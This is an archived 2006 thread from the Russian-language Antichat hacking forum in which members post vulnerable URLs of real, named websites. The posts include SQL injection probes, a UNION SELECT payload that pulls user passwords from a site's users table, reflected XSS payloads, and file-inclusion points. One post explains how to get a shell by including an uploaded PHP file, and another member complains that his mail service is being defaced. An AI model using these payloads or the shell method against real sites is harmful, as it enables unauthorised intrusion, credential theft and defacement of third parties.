ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #221  
Старый 11.06.2006, 03:28
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

http://www.linkexplorer.ru/4/?link=70792'
 

  #223  
Старый 11.06.2006, 22:30
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=IN BOX&sortdir=1&lang='

Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.
 

  #224  
Старый 11.06.2006, 23:51
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от b00zy_c0d3r  
http://www.mail.zp.ua/action.php?action=aff_mail&mail=1&sort=1&folder=IN BOX&sortdir=1&lang='

Какой-то левый ТИПА инклуд. Хер поймёшь. В этой строке есть ещё пару уязвимых параметров, но они ничего не дают. Тока ошипку.
Бля да шо вы за народ уже мою почту дефейсите вообще наглёж =(
 

  #225  
Старый 13.06.2006, 14:55
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

Вот нашел сайт с тестом типа
(Хочешь узнать кое-что про себя? )
ну я в ответы поставил.
'><script>alert('HakNet')</script>
проходит не фильтруетса..
сайт http://www.mostinfo.net/hlam/test/
 

  #226  
Старый 13.06.2006, 22:56
pch
Познающий
Регистрация: 22.10.2005
Сообщений: 37
Провел на форуме:
520745

Репутация: 141
По умолчанию

Нашёл сайт рекламного агенства hxxp://www.proreklamy.ru/. Между прочих услуг есть создание сайта от 500$ и до 1500$. "Ого", - подумал я и решил поискать sql в запросе hxxp://www.proreklamy.ru/?module=custompage&id=6. И что вы думаете? Скрипт инклудит страницу custompage.php без каких-либо проверок!!! Заливаем на народ шелл с расширением php и подставляем в урл - всё, у нас шелл!!! И так сделано большинство их сайтов за 500-1500 зелёных! Я уже молчу про strict'ы или хотя бы transitional - там НЕТ декларации вовсе!
Вывод: главное - PR, а остальное - ничто!
 

  #227  
Старый 14.06.2006, 00:04
3er0
Познающий
Регистрация: 31.03.2006
Сообщений: 36
Провел на форуме:
302384

Репутация: 4
Отправить сообщение для 3er0 с помощью ICQ
По умолчанию

__http://www.dunas.com.br/ing/main.php?inc=filo
__http://www.rus-fish.ru/?pg=xxx
__http://85.10.200.53/imat-uve.de/main.php?inc=%27

__http://pad.chasesdream.com/orion/downloads.php?cat=1%20UNION%20SELECT%200,user_pass word,0,0,0,0,0,0,0%20FROM%20orion_users%20WHERE%20 user_id=2/*
 

  #228  
Старый 14.06.2006, 17:05
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

http://www.kalina-shanson.com/smi/show.php?id=2'0
 

  #230  
Старый 15.06.2006, 11:29
back0rifice
Постоянный
Регистрация: 16.03.2006
Сообщений: 385
Провел на форуме:
1202141

Репутация: 283
По умолчанию

XSS на pages.ru (интересно, а кто-нибудь с АЧата на нём хостится ):

_http://www.pages.ru/search.html?text=%3Cscript%3Ealert%28%2Fback0rific e%2F%29%3C%2Fscript%3E&doSearch=%CD%E0%E9%F2%E8 - тройной alert() не хотели, хех ?!

Кто-нибудь юзает качалку GetRight? Тогда - держите XSS и не отрывайтесь:

_http://www.headlightinc.com/cgi-bin/faq.cgi?filter=%3Cscript%3Ealert%28%2Fback0rifice% 2F%29%3C%2Fscript%3E&submit1=Search
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ